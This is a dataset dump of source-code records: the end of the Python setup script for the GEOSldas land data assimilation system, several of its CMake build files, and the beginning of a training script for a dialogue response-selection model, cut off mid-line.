dictionary\n \"\"\"\n\n for key, val in d.iteritems():\n print key.ljust(23), ':', val\n\ndef _printExeInputKeys(rqdExeInpKeys):\n \"\"\"\n Private method: print sample exe input\n \"\"\"\n\n print '#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%#'\n print '# #'\n print '# REQUIRED INPUTS #'\n print '# #'\n print '# These inputs are needed to set up output dir structure. #'\n print '# #'\n print '#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%#'\n print \n print '############################################################'\n print '# #'\n print '# EXPERIMENT INFO #'\n print '# #'\n print '# Format for start/end times is yyyymmdd hhmmss. #'\n print '# #'\n print '############################################################'\n print\n print 'EXP_ID:'\n print 'EXP_DOMAIN:'\n print 'NUM_LDAS_ENSEMBLE:'\n print 'BEG_DATE:'\n print 'END_DATE:'\n \n print\n print '############################################################'\n print '# #'\n print '# RESTART INFO #'\n print '# #'\n print '# (i) Select \"RESTART\" option: #'\n print '# #'\n print '# Use one of the following options if you *have* a #'\n print '# GEOSldas- or LDASsa-produced restart file: #' \n print '# #'\n print '# RESTART: 1 #'\n print '# YES, have restart file from GEOSldas *or* LDASsa #'\n print '# in SAME tile space (grid) with SAME boundary #'\n print '# conditions and SAME snow model parameter (WEMIN). #'\n print '# GEOSldas-produced restart can be for the same or #'\n print '# a larger domain. #' \n print '# LDASsa-produced restart *must* be for the GLOBAL #'\n print '# domain. #' \n print '# #'\n print '# RESTART: 2 #'\n print '# YES, have restart file from GEOSldas *or* LDASsa but #'\n print '# in a DIFFERENT tile space (grid) or with #'\n print '# DIFFERENT boundary conditions or DIFFERENT snow #'\n print '# model parameter (WEMIN). #'\n print '# Restart *must* be for the GLOBAL domain. #'\n print '# #'\n print '# Use one of the following options if you DO NOT have a #'\n print '# GEOSldas- or LDASsa-produced restart file: #' \n print '# #'\n print '# RESTART: 0 #'\n print '# Cold start from arbitrary some old restart. #'\n print '# #'\n print '# RESTART: M #'\n print '# Re-tile from archived MERRA-2 restart file. #' \n print '# #'\n print '# RESTART: F #'\n print '# Re-tile from FP (Forward Processing) restart file. #' \n print '# #'\n print '# RESTART: G #'\n print '# Re-tile from any AGCM catch[cn]_internal_rst file. #'\n print '# #'\n print '# -------------------------------------------------------- #'\n print '# IMPORTANT: #'\n print '# Except for RESTART=1, SPIN-UP is REQUIRED in almost #'\n print '# all cases. #'\n print '# -------------------------------------------------------- #'\n print '# #' \n print '# #' \n print '# (ii) Specify experiment ID/location of restart file: #'\n print '# #'\n print '# For RESTART=1 or RESTART=2: #'\n print '# Specify RESTART_ID, RESTART_PATH, RESTART_DOMAIN with #'\n print '# restarts stored as follows: #'\n print '# RESTART_PATH/RESTART_ID/output/RESTART_DOMAIN/rs/ #'\n print '# #' \n print '# For RESTART=0 or RESTART=M or RESTART=F: #'\n print '# There is no need to specify RESTART_ID, RESTART_PATH, #'\n print '# and RESTART_DOMAIN. #'\n print '# #' \n print '# For RESTART=G: #'\n print '# RESTART_ID : full_path_to_AGCM_experiment_directory #'\n print '# RESTART_PATH : full_path_of_the_AGCM_restart_file #'\n print '# RESTART_DOMAIN is NOT required. #'\n print '# #'\n print '############################################################'\n\n print\n print 'RESTART:'\n print '#RESTART_ID:'\n print '#RESTART_PATH:'\n print '#RESTART_DOMAIN:'\n\n print\n print '############################################################'\n print '# #'\n print '# SURFACE METEOROLOGICAL FORCING #'\n print '# #'\n print '# See README files in ./src/Applications/LDAS_App/doc #'\n print '# #'\n print '# Surface meteorological forcing time step is in seconds. #'\n print '# #' \n print '############################################################'\n\n print\n print 'MET_TAG:'\n print 'MET_PATH:'\n print 'FORCE_DTSTEP:'\n\n print\n print '############################################################'\n print '# #'\n print '# LAND BOUNDARY CONDITIONS DIRECTORY #'\n print '# #'\n print '# See README files in ./src/Applications/LDAS_App/doc #'\n print '# #'\n print '############################################################'\n print\n print 'BCS_PATH:'\n print\n\n _fn = '../etc/GEOSldas_LDAS.rc' # run ldas_setup from /bin directory\n\n with open(_fn) as _f:\n i_ = 1\n for line in _f:\n if ( i_ < 5 or i_ >10): # ignore lines 5-10 - may need to change if GEOSldas_LDAS.rc is edited\n sys.stdout.write(line)\n sys.stdout.flush()\n i_ += 1\n print\n print\n\n _fn = '../etc/GEOS_SurfaceGridComp.rc' # run ldas_setup from /bin directory\n\n with open(_fn) as _f :\n i_ = 1\n for line in _f:\n if ( 5<=i_ and i_<=21) : # ignore lines 5-21 - may need to change if GEOS_SurfaceGridComp.rc is edited\n i_ +=1\n continue\n if '\"GEOSldas=>\"' in line:\n sys.stdout.write(line)\n elif 'GEOSldas=>' in line:\n line0 = line.split(\"GEOSldas=>\")[1]\n sys.stdout.write(line0)\n elif not line.strip() or line.strip().startswith('#'):\n sys.stdout.write(line)\n sys.stdout.flush()\n i_ += 1\n print\n print\n \ndef _printRmInputKeys(rqdRmInpKeys, optRmInpKeys):\n \"\"\"\n Private method: print sample resource manager input\n \"\"\"\n \n print '#'\n print '# REQUIRED inputs'\n print '#'\n print '# NOTE:'\n print '# (1) rm_name (resource manager name) is SLURM (PBS is no longer used)'\n print '# (2) walltime is in the format hh:mm:ss'\n print '#'\n for key in rqdRmInpKeys:\n print key.ljust(23), ':'\n print\n print '#'\n print '# OPTIONAL inputs'\n print '#'\n print '# NOTE:'\n print '# (1) Default job_name is \"exp_id\"'\n print '# (2) Default is no constraint'\n print '# (3) Do not specify qos (quality-of-service) by default. Specify \"debug\" for faster but limited service.'\n print '#'\n for key in optRmInpKeys:\n print '#'+key.ljust(23), ':'\n \ndef parseCmdLine():\n \"\"\"\n parse command line arguments and return a dict of options\n \"\"\"\n #print 'in: parseCmdLine'\n p = argparse.ArgumentParser(\n description= \\\n \"Script to setup a GEOSldas experiment. The script requires \"\\\n \"two (2) input files, one for the Fortran executable and the \" \\\n \"other for the resource manager (SLURM/PBS etc.). For sample \" \\\n \"input files try './ldas_setup sample -h'.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n p_sub = p.add_subparsers(help='sub-command help')\n\n # subparser: sample command\n p_sample = p_sub.add_parser(\n 'sample', \n help='write sample input files',\n description='Print sample input files - either for the '\\\n 'Fortran executable or the resource manager (SLURM, PBS etc.)',\n )\n group = p_sample.add_mutually_exclusive_group(required=True)\n group.add_argument(\n '--exeinp', \n help='print sample input file used to generate RC files for GEOSldas App.',\n action='store_true',\n )\n group.add_argument(\n '--batinp',\n help='print sample input file for SLURM ',\n action='store_true',\n )\n # subparser: setup command\n p_setup = p_sub.add_parser(\n 'setup', \n help='setup LDAS experiment',\n description=\"The 'setup' sub-command is used to setup a GEOSldas \" \\\n \"experiment. The positional argument 'exphome' is used to create \" \\\n \"work_path (exphome+/output) and run_path (exphome+/run).\"\n )\n p_setup.add_argument(\n '-v', \n '--verbose', \n help='verbose output', \n action='store_true',\n )\n p_setup.add_argument('exphome', help='experiment location')\n p_setup.add_argument(\n 'exeinpfile', \n help='input file with arguments used to generate RC files for GEOSldas App',\n )\n p_setup.add_argument(\n 'batinpfile', \n help='input file with arguments for SLURM',\n )\n p_setup.add_argument(\n '--account',\n help='replace computing/sponsor account in batinp file',\n type=str, default='None'\n )\n p_setup.add_argument(\n '--runmodel',\n help='Obsolete.',\n action='store_true',\n )\n spltgrp = p_setup.add_mutually_exclusive_group()\n spltgrp.add_argument(\n '--daysperjob',\n type=int,\n metavar='N',\n help='Obsolete. Use NUM_SGMT and JOB_SGMT in exeinp file.',\n )\n spltgrp.add_argument(\n '--monthsperjob',\n type=int,\n metavar='N',\n help='Obsolete. Use NUM_SGMT and JOB_SGMT in exeinp file.',\n )\n\n return p.parse_args()\n\n\nif __name__=='__main__':\n\n #print \"reading params....\"\n args = vars(parseCmdLine()) # vars converts to dict\n ld = LDASsetup(args)\n \n print \"creating dir structure\"\n status = ld.createDirStructure()\n assert(status)\n\n print \"creating restart and bc\"\n status = ld.createLnRstBc()\n assert(status)\n\n print \"creating RC Files\"\n status =ld.createRCFiles()\n assert status\n\n print \"creating gcm style batch Run scripts lenkf.j\"\n status = ld.createRunScripts()\n\n print \"creating batch Run scripts\"\n status = ld.createBatchRun()\n assert (status)\n"
},
{
"alpha_fraction": 0.7132530212402344,
"alphanum_fraction": 0.7542168498039246,
"avg_line_length": 28.64285659790039,
"blob_id": "ee678942aef237eb9720844ba7ccccc746f62394",
"content_id": "34bcd012db5210c62badca43920429bdfe56466e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 14,
"path": "/src/Components/GEOSldas_GridComp/GEOSlandpert_GridComp/CMakeLists.txt",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "esma_set_this ()\n\nset (SRCS\n nr_ran2_gasdev.F90 nr_jacobi.F90 nr_fft.F90\n random_fields.F90 land_pert.F90 force_and_cat_progn_pert_types.F90 LDAS_PertRoutines.F90\n GEOS_LandPertGridComp.F90\n )\n\nesma_add_library (${this}\n SRCS ${SRCS}\n DEPENDENCIES GEOS_LdasShared GEOSens_GridComp GEOSland_GridComp MAPL_Base ${MKL_LIBRARIES}\n INCLUDES ${INC_ESMF})\n\ntarget_compile_definitions(${this} PRIVATE MKL_AVAILABLE)\n"
},
{
"alpha_fraction": 0.7719298005104065,
"alphanum_fraction": 0.7719298005104065,
"avg_line_length": 27.5,
"blob_id": "eb30e2dd665f54ab6c179045bc71de165950cf5d",
"content_id": "d956e9feaa039c460a1cf5f51454864632080b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 57,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/src/Shared/CMakeLists.txt",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "add_subdirectory (@MAPL)\nadd_subdirectory (@GMAO_Shared)\n"
},
{
"alpha_fraction": 0.7402597665786743,
"alphanum_fraction": 0.7532467246055603,
"avg_line_length": 24.66666603088379,
"blob_id": "fe349f37af936a28644e568b899efd041d8ca4dc",
"content_id": "f0a099ffb1fad2bb58e37c3de1f64ee715ac0f99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 6,
"path": "/src/Components/GEOSldas_GridComp/GEOSens_GridComp/CMakeLists.txt",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "esma_set_this ()\n\nesma_add_library(${this}\n SRCS GEOS_EnsGridComp.F90\n DEPENDENCIES GEOSland_GridComp GEOS_LdasShared MAPL_Base\n INCLUDES ${INC_ESMF})\n"
},
{
"alpha_fraction": 0.6895424723625183,
"alphanum_fraction": 0.7026143670082092,
"avg_line_length": 20.10344886779785,
"blob_id": "1ff490514c4deeefa9f4488b8c4eb57f7cb3136d",
"content_id": "a869ac907e5e9e0e0c6ee49ba045815f07d6e4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 612,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 29,
"path": "/src/Applications/LDAS_App/CMakeLists.txt",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "ecbuild_add_executable (\n TARGET GEOSldas.x \n SOURCES GEOSldas.F90\n LIBS GEOSldas_GridComp MAPL)\n\nset(executables \n preprocess_ldas \n tile_bin2nc4 \n mwrtm_bin2nc4\n mk_GEOSldasRestarts)\n\nforeach (prog ${executables})\n ecbuild_add_executable (\n TARGET ${prog}.x \n SOURCES ${prog}.F90\n LIBS GEOSldas_GridComp mk_restarts)\nendforeach ()\n\ninstall(\n PROGRAMS ldas_setup process_hist.csh process_rst.csh\n DESTINATION bin\n )\n\nfile(GLOB rc_files GEOSldas_*rc)\nfile(GLOB nml_files LDASsa_DEFAULT*nml)\ninstall(\n FILES ${rc_files} ${nml_files} lenkf.j.template\n DESTINATION etc\n )\n"
},
{
"alpha_fraction": 0.7255192995071411,
"alphanum_fraction": 0.7774480581283569,
"avg_line_length": 43.93333435058594,
"blob_id": "afdd4d20dd2d2d30609b9169a374426b7ce2953c",
"content_id": "3ce449e2292299012b440bcadb674bd84c2b7cab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 15,
"path": "/src/Components/GEOSldas_GridComp/GEOSlandassim_GridComp/CMakeLists.txt",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "esma_set_this ()\n\nset (SRCS\n io_hdf5.F90 enkf_general.F90 adapt_types.F90 mwRTM_types.F90 clsm_ensupd_glob_param.F90\n mwRTM_routines.F90 clsm_ensupd_upd_routines.F90 clsm_ensdrv_drv_routines.F90\n clsm_ensupd_read_obs.F90 catch_bias_types.F90 clsm_bias_routines.F90 clsm_adapt_routines.F90\n clsm_ensupd_enkf_update.F90 clsm_ensdrv_out_routines.F90 GEOS_LandAssimGridComp.F90\n )\n\nesma_add_library (${this}\n SRCS ${SRCS}\n DEPENDENCIES GEOS_LdasShared GEOSens_GridComp GEOSlandpert_GridComp GEOSland_GridComp MAPL_Base GMAO_gfio_r4 hdf5hl_fortran hdf5_fortran ${NETCDF_LIBRARIES}\n INCLUDES ${INC_ESMF} ${INC_HDF5})\n\ntarget_compile_definitions (${this} PRIVATE LDAS_MPI)\n"
}
] | 8 |
atheerIT/test | https://github.com/atheerIT/test | 519a00f5d9a1f3a96ee6c699cc059ce59a0bcda7 | d11664bea7699ee6a1effc0751b9d390a29d72bf | 583252fddd3d0c82b18bdb986a92ecb607024766 | refs/heads/master | 2022-11-16T16:15:29.464497 | 2020-07-13T12:20:47 | 2020-07-13T12:20:47 | 279,294,907 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5529801249504089,
"alphanum_fraction": 0.5860927104949951,
"avg_line_length": 24.25,
"blob_id": "d148db02f959440f1d3ec7345d4c04513f0f046f",
"content_id": "781a997acdd058bcc9d0eb9699145fd059fd4c55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 12,
"path": "/retest.py",
"repo_name": "atheerIT/test",
"src_encoding": "UTF-8",
"text": "import re \n\np = re.compile(r'\\[[^\\s]+\\)', re.IGNORECASE)\ns = 'CSS is a language that can be used to add style to an [HTML](/wiki/HTML) page.'\nm = p.search(s)\ns1 = m.group()\nprint(s1)\np1 = re.compile(r'\\[[^\\s]+\\]')\nm1 = p1.search(s1)\nprint(m1.group())\nm2 = re.search(r'\\([^\\s]+\\)', s1)\nprint(m2.group())"
}
] | 1 |
jatin569/rest-api | https://github.com/jatin569/rest-api | 4a8cd5320cab5967a7369cc1a4d0b7d79097b634 | 53b0d277c443196f87662a2c75d0a50410b12062 | 1b45a87a10dc7148117cf2c7b2fbec3d2b644261 | refs/heads/master | 2021-01-02T14:33:36.226626 | 2020-02-11T03:04:31 | 2020-02-11T03:04:31 | 239,663,798 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.729629635810852,
"alphanum_fraction": 0.7444444298744202,
"avg_line_length": 32.75,
"blob_id": "0f004eed88223872c74f488dd31a1763860fdfdf",
"content_id": "a908f04e40feb9732f4227f21ed7fb58e683840a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 8,
"path": "/django rest framework/website/REST/serializers.py",
"repo_name": "jatin569/rest-api",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\nclass DummySerializer(serializers.Serializer):\n zip=serializers.CharField(max_length=10)\n city=serializers.CharField(max_length=10)\n age=serializers.IntegerField()\n\n def __str__(self):\n return \"dummy serializer\"\n"
},
{
"alpha_fraction": 0.7038834691047668,
"alphanum_fraction": 0.7038834691047668,
"avg_line_length": 28.428571701049805,
"blob_id": "bc9f5df6e851df06f2b2895b8cd76dbffe7adfa7",
"content_id": "98009ce6c8fbcbe9f87c311adb027b9f678e2da7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 7,
"path": "/django rest framework/website/REST/urls.py",
"repo_name": "jatin569/rest-api",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url,include\nfrom django.urls import path ,include\nfrom . import views\nurlpatterns = [\n path('', views.PersonView.as_view()),\n path('add/', views.weatherView.as_view()),\n]\n"
}
] | 2 |
RobinHeath-Albuquerque/robin_heath_RPSLS | https://github.com/RobinHeath-Albuquerque/robin_heath_RPSLS | 998a7f93a93c7d683b6b2f0f15703bc1f3194660 | 1427281e34502872241836e5842cb10eba26eb33 | 4fbaaa93d54ef25ce3bd7129dee431be75235c8b | refs/heads/main | 2023-03-28T04:00:05.138756 | 2021-03-25T03:55:17 | 2021-03-25T03:55:17 | 350,412,117 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.620396614074707,
"alphanum_fraction": 0.624443531036377,
"avg_line_length": 29.887500762939453,
"blob_id": "82fa22a1cec513f17ceb429552d058e11177ff22",
"content_id": "2abc20315fbf0a6e2e5f6d195110ddb4f90f1dfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2471,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 80,
"path": "/rpsls.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "import random\nfrom Game import Game, my_rules, my_gestures\nfrom Computer import Computer, computer\nfrom unittest import result\n\nx = input('Please enter your name:')\nprint('Hello, ' + x + '. Good luck!')\nprint()\nprint('Here are the rules:')\nfor x in my_rules:\n print(x)\nprint()\nprint('The best of 3 will win the game!')\nprint()\n\nplayerOne_score = int(0)\ncomputer_score = int(0)\nscore_limit = 5\nwhile playerOne_score != score_limit or computer_score != score_limit:\n playerOne: str = input(str(\"Please enter your gesture:\")).lower()\n\n computer_move = random.choice(my_gestures)\n\n print(\"The computer chooses\", computer_move)\n\n if computer_move == \"rock\" and playerOne == \"rock\":\n print(\"Tie!!\")\n\n if computer_move == \"paper\" and playerOne == \"paper\":\n print(\"Tie!!\")\n\n if computer_move == \"scissors\" and playerOne == \"scissors\":\n print(\"Tie!!\")\n\n if computer_move == \"lizard\" and playerOne == \"lizard\":\n print(\"Tie!!\")\n\n if computer_move == \"Spock\" and playerOne == \"Spock\":\n print(\"Tie!!\")\n\n elif computer_move == \"paper\" and playerOne == \"rock\" or \"Spock\":\n print(\"The computer scores\")\n\n computer_score = computer_score + 1\n print(\"The computers score is:\", computer_score)\n\n elif computer_move == \"rock\" and playerOne == \"paper\" or \"Spock\":\n print(x + \" scores\")\n\n playerOne_score = playerOne_score + 1\n print(\"Your score is:\", playerOne_score)\n\n elif computer_move == \"rock\" and playerOne == \"scissors\" or \"lizard\":\n print(\"The computer scores\")\n\n computer_score = int(computer_score) + 1\n print(\"The computers score is:\", computer_score)\n\n elif computer_move == \"scissors\" and playerOne == \"rock\" or \"Spock\":\n print(x + \" scores\")\n\n playerOne_score = playerOne_score + 1\n print(\"Your score is:\", playerOne_score)\n\n elif computer_move == \"paper\" and playerOne == \"scissors\" or \"lizard\":\n print(x + \" scores\")\n\n playerOne_score = playerOne_score + 1\n print(\"Your score is:\", playerOne_score)\n\n elif computer_move == \"scissors\" and playerOne == \"paper\" or \"lizard\":\n print(\"The computer scores\")\n\n computer_score = int(computer_score) + 1\n print(\"The computers score is:\", computer_score)\n\n elif playerOne_score == score_limit:\n print(\"Congrats! You won!\")\n elif computer_score == score_limit:\n print(\"The computer won, better luck next time\")\n"
},
{
"alpha_fraction": 0.47863247990608215,
"alphanum_fraction": 0.47863247990608215,
"avg_line_length": 26.25,
"blob_id": "23a658a603f8114262a4c5c498b8b5b1946f54f6",
"content_id": "c67f8885ad9d602f3b6a3db96a838c1318933e21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 4,
"path": "/Spock.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "class Spock:\n def __init__(self):\n self.name = 'Spock'\n self.loses_to = ['Lizard', 'Paper']\n "
},
{
"alpha_fraction": 0.5309734344482422,
"alphanum_fraction": 0.5309734344482422,
"avg_line_length": 27.25,
"blob_id": "811292dbe8da476c88fb584b2b0dccd21255f111",
"content_id": "18ba981756cf6b809f8fd402e29462c9695805d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 113,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 4,
"path": "/Scissors.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "class Scissors:\n def __init__(self):\n self.name = 'Scissors'\n self.loses_to = ['Rock', 'Spock']\n"
},
{
"alpha_fraction": 0.5425414443016052,
"alphanum_fraction": 0.5480663180351257,
"avg_line_length": 30.20689582824707,
"blob_id": "c07d940cf61afc9d6b0797df190900d6b115bb5e",
"content_id": "4c628af7c57fad4beeef3dc5f5a283a0adae6796",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 905,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 29,
"path": "/Game.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "from random import randrange, random\n\n\nclass Game:\n def __init__(self, gestures, rules,):\n self.name = ()\n self.gestures = my_gestures\n self.rules = my_rules\n\n\nmy_gestures = ['rock', 'Spock', 'paper', 'lizard', 'scissors']\n\n\nmy_rules = ['Rock crushes Scissors' 'Scissors cuts Paper', 'Paper covers Rock', 'Rock crushes Lizard', 'Lizard poisons '\n 'Spock',\n 'Spock smashes Scissors', 'Scissors decapitates Lizard', 'Lizard eats Paper', 'Paper disproves Spock',\n 'Spock vaporizes Rock']\n\n\ndef result(winner_result, player_choice, computer_choice, win=2, lose=2, tie=None):\n\n # accumulate the appropriate winner of game total\n if result == 'win':\n win += 1\n elif result == 'lose':\n lose += 1\n else:\n tie += 1\n return result\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 14.416666984558105,
"blob_id": "f572f8e0b1231f713c0a3f32f861747c850930bd",
"content_id": "7c8aad731efbd4704f1bb2976f86398c1d80dd75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 24,
"path": "/main.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "import RPSLS\n\nfrom Game import Game\nfrom Players import Players\n\nfrom Lizard import Lizard\n\nfrom Spock import Spock\n\nfrom Paper import Paper\n\nfrom Scissors import Scissors\n\nfrom Rock import Rock\n\nif __name__ == '__main__':\n game = Game()\n game.run_game()\n\nRPSLS.rpsls(\"rock\")\nRPSLS.rpsls(\"Spock\")\nRPSLS.rpsls(\"paper\")\nRPSLS.rpsls(\"lizard\")\nRPSLS.rpsls(\"scissors\")\n\n"
},
{
"alpha_fraction": 0.5267857313156128,
"alphanum_fraction": 0.5267857313156128,
"avg_line_length": 27,
"blob_id": "f59270d7d4d2ef76d56c076fcbf34942aa5052db",
"content_id": "fabbde373c9d4e7cf0e01712572cb2187ea78b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 4,
"path": "/Lizard.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "class Lizard:\n def __init__(self):\n self.name = 'Lizard'\n self.loses_to = ['Rock', 'Scissors']\n"
},
{
"alpha_fraction": 0.5379310250282288,
"alphanum_fraction": 0.5379310250282288,
"avg_line_length": 22.16666603088379,
"blob_id": "1b1d5d8d4718b16b26f14e15cc3c0cbf6df6aaf2",
"content_id": "7b0d0e6a9352dce9d151977dccf7f2b3145073c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/Players.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "\nclass Players:\n def __init__(self, types):\n self.choice = ''\n self.types = my_players\n\nmy_players = ['human', 'computer']\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6927374005317688,
"alphanum_fraction": 0.6927374005317688,
"avg_line_length": 11.785714149475098,
"blob_id": "6c0de02e8cc645c646339e986b6f78a13b9cb75d",
"content_id": "b3b2a281fb8676c7de38cce9a0c23c822c40f245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 14,
"path": "/Human.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "from Players import Players\n\n\nclass Human(Players):\n\n def make_gesture(self):\n print(self.gestures)\n\n\nplayerOne = Human()\n\nplayerOne.make_gesture()\n\nplayerTwo = Human()\n"
},
{
"alpha_fraction": 0.5267857313156128,
"alphanum_fraction": 0.5267857313156128,
"avg_line_length": 27,
"blob_id": "2cc76c9203d185f3c709b1b880088d69b8ee9582",
"content_id": "3f071d70cd5d684531c5dee2b751bc4750a3d938",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 4,
"path": "/Paper.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "class Paper:\n def __init__(self):\n self.name = 'Paper'\n self.loses_to = ['Scissors', 'Lizard']\n"
},
{
"alpha_fraction": 0.6852589845657349,
"alphanum_fraction": 0.6852589845657349,
"avg_line_length": 15.733333587646484,
"blob_id": "69cb17259af3e1f1350dc6df8a560c6c6307dedf",
"content_id": "212bdb63407fd7ac664919972d9ad788528047c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 15,
"path": "/Computer.py",
"repo_name": "RobinHeath-Albuquerque/robin_heath_RPSLS",
"src_encoding": "UTF-8",
"text": "from Players import Players\nimport random\nfrom Game import Game, my_gestures\n\n\nclass Computer(Players):\n\n def __init__(self, choice):\n self.choice = random.choice\n\n def make_gesture(self):\n print(self.choice)\n\n\ncomputer = Computer\n"
}
] | 10 |
hanjanghoon/NLP_Dialog_MSN-PyramidNet-Domain-Knowledge | https://github.com/hanjanghoon/NLP_Dialog_MSN-PyramidNet-Domain-Knowledge | 270f4aaabc3011efa0c39743be4f00ed93a129a6 | 9fb73f4a75435cc92782b93ceea84dfc11c55aeb | 8896fd8a49664ab95dc29ce0fedc7621ed310411 | refs/heads/master | 2022-12-31T15:07:36.200473 | 2020-10-26T11:03:15 | 2020-10-26T11:03:15 | 307,299,460 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5491451025009155,
"alphanum_fraction": 0.5614182353019714,
"avg_line_length": 35.93410873413086,
"blob_id": "5878762cc9f5e229f2b6813f8146e48c8287ed7d",
"content_id": "6fc44acc83a19124d77c48bddcd838c8b0e60884",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9585,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 258,
"path": "/run.py",
"repo_name": "hanjanghoon/NLP_Dialog_MSN-PyramidNet-Domain-Knowledge",
"src_encoding": "UTF-8",
"text": "import time\nimport argparse\nimport pickle\nfrom MSN import MSN\nimport os\nimport numpy as np\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\ntask_dic = {\n 'ubuntu':'./dataset/ubuntu_data/',\n 'douban':'./dataset/DoubanConversaionCorpus/',\n 'alime':'./dataset/E_commerce/'\n}\ndata_batch_size = {\n \"ubuntu\": 100,\n \"douban\": 150,\n \"alime\": 200\n}\n\n## Required parameters\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--task\",\n default='ubuntu',\n type=str,\n help=\"The dataset used for training and test.\")\nparser.add_argument(\"--is_training\",\n default=False,\n type=bool,\n help=\"Training model or evaluating model?\")\nparser.add_argument(\"--max_utterances\",\n default=10,\n type=int,\n help=\"The maximum number of utterances.\")\nparser.add_argument(\"--max_words\",\n default=50,\n type=int,\n help=\"The maximum number of words for each utterance.\")\nparser.add_argument(\"--batch_size\",\n default=0,\n type=int,\n help=\"The batch size.\")\nparser.add_argument(\"--gru_hidden\",\n default=300,\n type=int,\n help=\"The hidden size of GRU in layer 1\")\nparser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\nparser.add_argument(\"--l2_reg\",\n default=0.0,\n type=float,\n help=\"The l2 regularization.\")\nparser.add_argument(\"--epochs\",\n default=100,\n type=float,\n help=\"Total number of training epochs to perform.\")\nparser.add_argument(\"--save_path\",\n default=\"./checkpoint/\",\n type=str,\n help=\"The path to save model.\")\nparser.add_argument(\"--score_file_path\",\n default=\"score_file.txt\",\n type=str,\n help=\"The path to save model.\")\nargs = parser.parse_args()\nargs.batch_size = 